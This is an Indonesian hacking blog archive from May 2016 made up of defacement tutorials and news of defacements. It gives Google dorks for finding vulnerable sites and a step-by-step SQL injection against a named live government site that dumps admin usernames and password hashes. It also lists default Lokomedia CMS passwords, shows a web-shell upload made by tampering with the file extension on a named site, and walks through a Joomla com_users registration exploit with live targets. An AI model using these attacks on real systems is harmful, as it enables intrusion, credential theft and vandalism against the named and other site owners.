-

Wednesday 25 May 2016

Dork Com_User 26 Mei 2016

Hai Gan Jumpa Lagi Dengan saya Admin Tamvan hehehe .. Udah lama Nih Gak Update tentang Dork Joomla Yaitu Com User Karena Sibuk kerja Dan Tentunya Dalam Dunia Gelap hehehe .. Oke Udah pada penasaran ya Dork Nya Yg Baru Kaya Gi Mana .. sabar ya Admin Tamvan Abis Dapet Dork terbaru dengan sedikit Kreasi dari saya sendiri dan tentunya Bantuan dri mbah google ... silahakan dork ada di Bawah Gan ..


Dork :

-inurl:index.php?format=feed&type=rss intext:Joomla! 1.7 Open Source

-inurl:index.php?format=feed&type=rss intext:Joomla! 1.6 Open Source

-inurl:component/content/category/ intext:Joomla! 1.7 Open Source

-inurl:component/content/category/ intext:Joomla! 1.6 Open Source

Dork Bisa di Kembangkan Lagi Bisa di tambah Site:com,Net, Dll ..

Sekian dulu dari saya Semoga Bermanfaat ..

Quote: Dalam Dunia Hacking tidak ada Yg Sulit Semua Perlu Kesabaran dan Keseriusan Dalam Belajar agar Anda Bisa ;) Semua Tergantung Diri Anda sendiri

Sunday 15 May 2016

Deface Dengan SQL Injection





Pengertian SQL Injection 

SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat memasukkan perintah-perintah SQL melalui url untuk dieksekusi oleh database. Penyebab utama dari celah ini adalah variable yang kurang di filter : 

id=$id;……. > Got Error 

Hal pertama yang harus kita lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter ‘ setelah atau sesudah angka pada url.


Contoh : 

http://situstarget.com/news.php?id=1’ 
http://situstarget.com/news.php?id=’1

Pertama kita cari dulu website yang memiliki celah SQL Injection. silahkan sobat cari target di google dengan menggunakan dork.

Dork SQLi :



inurl:azerty.php?id= , 
inurl:bouquin.php?id= , 
inurl:lien.php?id= , 
inurl:clavier.php?id= 
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:games.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
Live target : http://diklat.lampungprov.go.id/more.php?id=1



Kemudian kita akan mencari dan menghitung jumlah tabel yang ada pada database web tersebut. silahkan sobat gunakan perintah : order by 1 - dan seterusnya sampai terjadi error pada halaman. gunaka tanda + sebagai spasi, dan pada akhir perintah gunakan tanda --.

http://diklat.lampungprov.go.id/more.php?id=1+order+by+1-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+2-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+3-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+4-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+5-- < No Error [Terlalu banyak diSkip aja]
http://diklat.lampungprov.go.id/more.php?id=1+order+by+17-- < No Error

  
http://diklat.lampungprov.go.id/more.php?id=1+order+by+18-- < Error



Pada angka 18 ternyata muncul error, jadi yang kita ambil angka sebelum munculnya pesan error. itu berarti jumlah tabel pada databasenya ada 17.


Selanjutnya kita akan mencari angka tabel yang bisa kita gunakan untuk perintah2 injection pada tahap selanjutnya. Gunakan perintah union select diikuti jumlah tabel dan tanda - sebelum angka dan diakhiri dengan tanda --. contoh:

http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--



Disini bisa kita lihat bahwa angka yang muncul yaitu 16 dan 17. kedua angka tersebut nantinya yang akan kita masukkan perintah2 selanjutnya.


Pada tahap Selanjutnya kita akan mengetahui versi database yang dipakai oleh web tersebut. gunakan perintah "version()" atau "@@version".
contoh: 
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,@@version,17--




Nah pada gambar kita bisa lihat versi database yang dipake adalah v.5.5.14, jadi pada versi 5 itu berberda dengan versi 4. prosesnya lebih repot pada versi 4, karena untuk melakukan perintah2 SQLi pada versi 4 kita harus menebak 1 per 1 tabel yang ada pada databasenya.

Sekarang perintah selanjutnya kita akan memunculkan nama-nama tabel yang ada pada web tersebut. gunakan perintah “group_concat(table_name)” dan menambahkan perintah “from+information_schema.tables+where+table_schema=database()" sesudah angka terakhir, dan diakhiri dengan tanda --.
contoh :
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(table_name),17+from+information_schema.tables+where+table_schema=database()--


Disitu kita dapatkan nama-nama tabelnya sperti : tbadmin, tbbukutamu, tbcontent, tbcounter, tbdivisi, tbgolongan, tbjadwal, dll. Langkah selanjutnya kita akan mencari username dan password admin pada tabeltbadmin. Perlu diketahui bahwa tidak semua nama tabel pada setiap web itu sama, jadi untuk mencari tabel admin, silahkan sobat kira-kira saja dimana tabel yang sobat curigai tempat username dan password admin berada. Kemudian untuk mengeluarkan isi yang ada pada kolom tbadmin gunakan perintah berikut: “group_concat(columns_name) ” dan perintah “from+information_schema.columns+where+table_name=CHAR()" sesudah angka terakhir, dan diakhiri dengan tanda --. Pada tahap ini nama tabel tbadmin harus dikonversi dulu ke bentuk decimal :) silahkan sobat gunakan toolsnya DISINI. kemudian hasil konversi tbadmin adalah 116 98 97 100 109 105 110 lalu kita masukkan ke CHAR(116, 98, 97, 100, 109, 105, 110) dan pisahkan dengan koma. jadi perintahnya seperti berikut:

http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(column_name),17+from+information_schema.columns+where+table_name=CHAR(116, 98, 97, 100, 109, 105, 110)--


Nah disitu muncul kolom username, pswd, status. lalu langkah selanjutnya kita akan melihat isi dari kolom kolom yang muncul tadi dengan menambah perintah group_concat(username,0x3a,pswd,0x3a,status) . jangan lupa di setiap sela2 tambahkan kode 0x3a yg merupakan hasil konversi hexa dari tanda titik dua ( : ). lalu tambahkan perintah  +from+tbadmin--, tbadmin merupakan tabel yang kita dapatkan tadi.

http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(username,0x3a,pswd,0x3a,status),17+from+tbadmin--



Nah kan udah keliatan username dan passwordnya.. :) dari gambar muncul data :
user1:8dfad4f7356a2e403c900b2944990ddc:1,user:8dfad4f7356a2e403c900b2944990ddc:0 selanjutnya sobat tinggal mengcrack password yang berbentuk md5 hash tersebut. untuk mengcracknya silahkan gunakan toolsnya disini. Selanjutnya tinggal mencari halaman logginnya.


Sumber : indocyberarmy

Cyber War Antara Hacker Philipine Vs Indonesia

Perang Cyber antara hacker Filipina dan hacker Indonesia . Hal ini dapat dilihat setelah website yang berbeda telah dirusak oleh tentara maya pada Pertengahan Tahun 2015

Terjadinya Perang Cyber ini di picu oleh aakan di eksekusi terpidana mati Mary Jane Veloso di Indonesia. hacker Pinoy menyebut diri mereka BloodSec Internasional merusak beberapa situs web Indonesia untuk menunjukkan protes dan meminta grasi Veloso.

Ini adalah hacker yang sama yang hack beberapa subdomians dari Globe pada November 2014.
Namun hacker Indonesia tidak tinggal dia mereka mengatas namakan dari team " Java Intelegent Cyber " Melakukan Serangan Balasan terhadap Situs Dari Negara Philipine, mereka telah menulis sebuah surat terbuka untuk memperingatkan Pinoy hacker ( BllodSec Internasional ) atas tindakan mereka. Mereka menulis pesan yang bersumber dari pepatah pastebin,berikut pesan dari Hacker Indonesia

"We ask you destination, why you hacked our website.. You start because one of your sites. deped-davaocity.com and you hacked 30+ Indonesian sites. We launch the attack and stated this is a cyber war , remember it."
"We are anonymous Indonesia, we remain silent, we stand here to destroy your site. "
 
 

Wednesday 11 May 2016

Website InfoSec.asia Australia Di Deface

Lagi-lagi Anak Bangsa Melakukan Defacement Website Kali ini Yang menjadi sasaran adalah Website Milik Negeri Kanguru Yaitu ( Australia ) Defacer dengan Code Name ( ./51N1CH1 ) Dan ( Shiro'Tenshi ) Kali ini Bekerja sama Untuk menguji System Security Web Tersebut . Yang berasal dari Team " INDONESIAN INTELEGENT SECURITY "

Teruslah Berkreasi Demi Memajukan ilmu IT di Bangsa kita ini..




Link Web : http://infosec.asia/
Mirror      : http://zone-h.org/mirror/id/26247671

Sekian sekilas Info Dari saya Sampai Jumpa Lagi.

Tuesday 10 May 2016

Sub Domain Universitas Negeri Khairun Di DEFACE







Sub Domain UNKHAIR Terkena Deface Lagi-Lagi Para Defacer Meretas sebuah Web Milik Universitas Ternate yaitu dengan Code Name " ./51N1CH1 " dari "Indonesian Intelegent Security" entah apa Motif Sang Defacer mendeface Web itu .apakah hanya ingin Test security Websitenya? itu yg menjadi sebuah pertanyaan saya hehe

Namun sang Defacer Tidak sampai merusak Websitenya Karena Sang Defacer Hanya Menitipkan Sebuah file . ( x.php )


Semoga Admin Web Nya bisa membenahi Celah/Bug Web tersebut agar tidak kembali terkena Deface .

berikut Subdomain yg menjadi Target sang Defacer


http://acil.unkhair.ac.id/x.php
http://aseng.unkhair.ac.id/x.php
http://mangrove.unkhair.ac.id/x.php
http://muliadi.unkhair.ac.id/x.php
http://perikanan.unkhair.ac.id/x.php
http://pertanian.unkhair.ac.id/x.php
http://sofyansamad.unkhair.ac.id/x.php

Sekian Berita Kali ini Semoga Bermanfaat Sampai Jumpa Lagi .



Deface Web Dengan Bug CMS LOKOMEDIA

pasti udah pada tau kan Tehnik Deface yg satu ini hehehe karena POC ini sangat di sukai sama para Defacer Karena mengarah ke domain ID ( Indonesia ) :v wkwkwkwk oke langsung aja simak Gan

Ada Macam-macam Bug di CMS Lokomedia ini :D

1. Default User and Password ~

- User  : Password -

admin : admin
wiro : sableng
wiros : sabdi
joko : sembung
sinto : gendeng

2. Upload Shell Langsung Tanpa Harus Login Admin ^_^

Ingad /adminweb/ nya bisa diganti Yah Sesuai path Admin Loginnya :v /

Exploit :

-  adminweb/content.php?module=download 
-  adminweb/content.php?module=banner
-  adminweb/content.php?module=berita


Nah Langsung Saja Kita bahas Cara2 nya >_< :D /
Disini Saya  Memakai Teknik Yang pertama Yaitu dengan Bug Default User and Password :D /

Oke Langsung Saja Kita Cari Targetnya dulu :v /

Dork nya ini : module=download intext:"cileungsi"

Dork Bisa Di Kembangin yah Kalo Mau Berhasil & Dapet Banyak Target Pastinya wkwk :v /

Nah gw Udah Dapet Target nih http://cyberandry.com/ Sebagai Kelinci Percobaan wkwk :v /

Sekarang coba buka Letak Login Adminnya ^_^
Biasa nya lokomedia :

/adminweb , /admin , /administrator


Kalau ga Ketemu ya bisa Pakai Admin Login Snanner kak :D /

Nah gw Udah Ketemu nih Admin Loginnya http://cyberandry.com/adminweb/ :D /

Coba Kamu Login Dengan Default User and Password Tadi Yang Saya Kasih Diatas :D 


 

Nah saya Berhasil Masuk wkwk :v

 

Nah Yang jadi Pertanyaan Gimana Cara Upload Shellnya ? :o
wkwk Tenang Vroh Ga Usah Panik kakak :v :v /
Cari Aja Fitur Yang Ada Uploader nya :D 
Nah Kalau Saya masang Shell nya Lewat Pasang Banner :D 
Klik " Banner "  - Terus  Klik " Tambah Banner " :D

Nah diKarenakan ga bisa Upload File Ber-Ekstensikan .php Terpaksa kita pakaiLive Http Headers Deh wkwkw Atau Tamper Data :v /



Kalau Belom Punya bisa di download Disini - > ( Live Http Headers ) atau Disini ( Temper Data ) :))

Kalau Saya Memakai Live Http Headers :D /

Nah Langsung aja ~ Rename Shell Kalian Jadi Formatnya gini shellkamu.php.jpg:D  

Lalu Klik " Tambah Banner " ~  

Isi Data2 nya Ngasal aja Kak wkwk :v 

  

Lalu Klik Simpan ~ Nah Lalu Segera Kalian Buka Fitur Live Http Headers tadi :)
Klik Tools - Lalu Klik " Live HTTP Headers " ~

 

Kalo Sudah Lalu Kita Rename shell nya :D jadi enzy-leovarisa.php.jpg Jadi enzy-leovarisa.php :D
Caranya Kita Cari File Yang Kalian Upload Tadi ~ Lihat Gambar Diatas :D 
Lalu Klik Replay :D

 

Kalo Sudah & Sukses ~ Klik Edit Pada Banner Yang Kalian Sudah Upload :D
Nanti Ada Gambar ( Kaya Foto Pecah2/ Rusak wkwk ) ~ Terus Kalian Klik Kanan di Gambar itu ~ Terus Klik " View Image " :D

  

Atau Bisa Juga Tinggal Kalian Panggil Shell Kalian :D
Caranya Kaya gini www.site.com/foto_banner/namashell.php

Shell Saya Nih http://www.cyberandry.com/foto_banner/enzy-leovarisa.php wkwk :D

  

Wkwkwk Muncul Deh Shell nya :v

Thanks To Intelsect :*

Tuesday 3 May 2016

Cara Deface Web Joomla Dengan Com_User

Hallo Apa Kabar Gan hehehe Kembali lagi dengan saya Admin Tamvan :v .. udah lama Gak share cara deface yak .. Nah kali ini saya akan share Metode Deface CMS Joomla Com User apa ada yg tau apa itu Com User ? Com_User adalah salah satu teknik Exploit Joomla yang paling banyak diminati oleh defacer-defacer yang ada di indonesia dan bahkan di seluruh dunia.

Oke setelah Agan Udah tau apa itu Com_User Kita Langsung Ke TKP Nya Gan simak ya .

Yang anda butuhkan:
1. Exploit Joomla (download disini)

Langkah-Langkah:

1. Cari web target dengan menggunakan mesin pencari dengan "dork" yang ada dibawah ini.
Klik untuk membuka: Google Dork Com_User

2. Setelah mendapatkan suatu web yang menggunakan CMS Joomla!, lalu cobalah membuka halaman administrator untuk memastikan apakah webnya "vuln" atau tidak

3. Cari web yang vuln.
*Penjelasan: Vuln = Vulnerability = Mempunyai kelemahan. Sehingga web yang dikatakan vuln berarti bisa untuk kita Deface.


Gambar diatas merupakan site "Vuln" alias menggunakan CMS Joomla Versi 1.7.X

Gambar diatas merupakan site "Joomla versi 1.6.x / 2.5.x".

Note: "Perbedaan Site Vuln dengan yang lainnya, terlihat pada bagian bawah atau footer Admnistration Login pada web Joomla nya."

*Web yang menggunakan "versi 1.6.x dan 2.5.x" itu bukan berarti sitenya tidak tidak bisa di deface/tidak vuln, hanyasaja web yang seperti itu peluangnya dapat di defacenya  hanya 25% dari keseluruhan web joomla seperti gambar diatas. Tapi jika anda telah lama mendeface web dengan cara ini, anda akan mengetahui ciri-ciri Web Joomla yang bisa di deface tanpa harus melihat halaman administratornya.
4. Setelah menemukan site yang "vuln". masukkan tambahan alamat berikut di belakang alamat/domain/url web sitenya.
index.php?option=com_users&view=registration

*misal, web yang akan saya deface adalah http://targetmu.com/joomla/ maka, saya harus menambahkan exploit di belakang alamat web tersebut menjadi http://targetmu.com/joomla/index.php?option=com_users&view=registration
5. setelah sudah mengikuti langkah diatas, anda akan masuk ke tempat registrasi.
*Jika saat anda pergi ke halaman registrasi, dan lalu web itu meredirect anda ke halaman login. Carilah target lain. Karena admin web itu sudah menghapus halaman registrasinya.
6 Setelah masuk ke tempat registrasi seperti gambar diatas. maka langkah selanjutnya adalah menekan tombol ctrl+u / klik kanan -> Lihat sumber laman dan akan muncul tampilan seperti gambar di bawah.
7. Cari kode hidden (dengan bantuan ctrl+f ) dan cari kode hidden seperti gambar di bawah ini. 
8. Copy code yang diberi kotak merah tersebut ke Exploit Joomla yang telah kamu download tadi.
9. Buka Exploit Joomla yang telah kamu download tadi dengan Notepad. Lalu kamu paste kode yang telah kamu copy tersebut dikotak merah kedua (yang di paling bawah). Dan masukkan alamat web yang telah di exploit tersebut. 
contoh: http://targetmu.com/joomla/index.php?option=com_users&view=registration ke kotak merah pertama yang terdapat di tempat paling atas.
*Jangan lupa mengganti alamat email dan username nya (terserah kamu )
*Password dibiarkan berbeda

10. Save file tersebut.
11. Lalu buka Exploit Joomla tersebut dengan web browser (google chrome/mozilla firefox )
12. Setelah di buka, maka akan muncul tampilan seperti gambar di bawah ini.
13. Setelah di buka dengan web browser dan muncul tampilan seperti gambar berikut. Lalu langkah selanjutnya adalah klik tombol Register yang terdapat di bagian bawah.
14. Lalu akan ada tulisan password yang anda masukkan tidak sama. (kalau di bahasa indonesia kan)
15. Ganti password tersebut (terserah anda) dan klik register kembali.
16. Setelah sukses, buka alamat link aktivasi yang terdapat di email anda.
*Jika alamat link aktivasi tidak masuk ke INBOX sebuah web, coba lah lihat di halaman SPAM. Dan jika tidak masuk kedua-duanya, cobalah reload/refresh email anda.
17. Setelah di klik link aktivasi pada email, maka anda telah menyelesaikan registrasi. dan anda bisa login kedalam halaman administrator. (tambahkan kode /administrator di belakang alamat web tersebut)
*misal alamat web nya adalah http://targetmu.com/joomla/ maka anda harus menambahkan /administrator di belakang web nya. seperti http://targetmu.com/joomla/administrator
18. Setelah itu anda masukkan username dan password, lalu login.
19. Taraaaa, sekarang anda sudah masuk kedalam halaman adminnya dan tinggal di tebas indexnya.

Live Target : http://bewusstseinsmedizin.org 
                    http://solidvend.com

NB: Untuk Live Target Mohon Jangan di rusak Karna di Buat sebagai Bahan Pembelajaran ;) 


Newer Posts Older Posts Home